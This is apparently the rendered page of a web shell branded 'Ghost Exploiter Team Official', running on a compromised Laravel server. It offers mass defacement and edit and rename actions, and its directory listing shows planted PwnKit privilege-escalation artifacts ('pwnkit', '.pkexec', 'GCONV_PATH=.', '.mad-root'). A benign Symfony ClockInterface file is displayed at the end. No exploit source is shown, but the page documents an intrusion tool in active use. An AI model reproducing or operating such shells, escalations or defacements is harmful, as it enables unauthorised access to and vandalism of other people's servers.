Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Http
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.pkexec
--
ren
Controllers
--
ren
GCONV_PATH=.
--
ren
Resources
--
ren
.mad-root
0KB
edt
ren
ArticleToGroup.php
0.453KB
edt
ren
BankService.php
0KB
edt
ren
BaseService.php
0.099KB
edt
ren
CashFlowService.php
0KB
edt
ren
ClockInterface.php
0.546KB
edt
ren
CqrsServiceProvider.php
0KB
edt
ren
MessageResponse.php
1.271KB
edt
ren
OpenApiValidationErrorR
...
0KB
edt
ren
PaginationDto.php
0KB
edt
ren
ResetPasswordNotificati
...
1.28KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
TokenResponse.php
1.604KB
edt
ren
auth.php
0KB
edt
ren
debugbar.php
13.946KB
edt
ren
pwnkit
10.992KB
edt
ren
pwnkit-20260128043908.
10.992KB
edt
ren
services.php
0KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Clock; use Psr\Clock\ClockInterface as PsrClockInterface; /** * @author Nicolas Grekas <p@tchwork.com> */ interface ClockInterface extends PsrClockInterface { public function sleep(float|int $seconds): void; public function withTimeZone(\DateTimeZone|string $timezone): static; }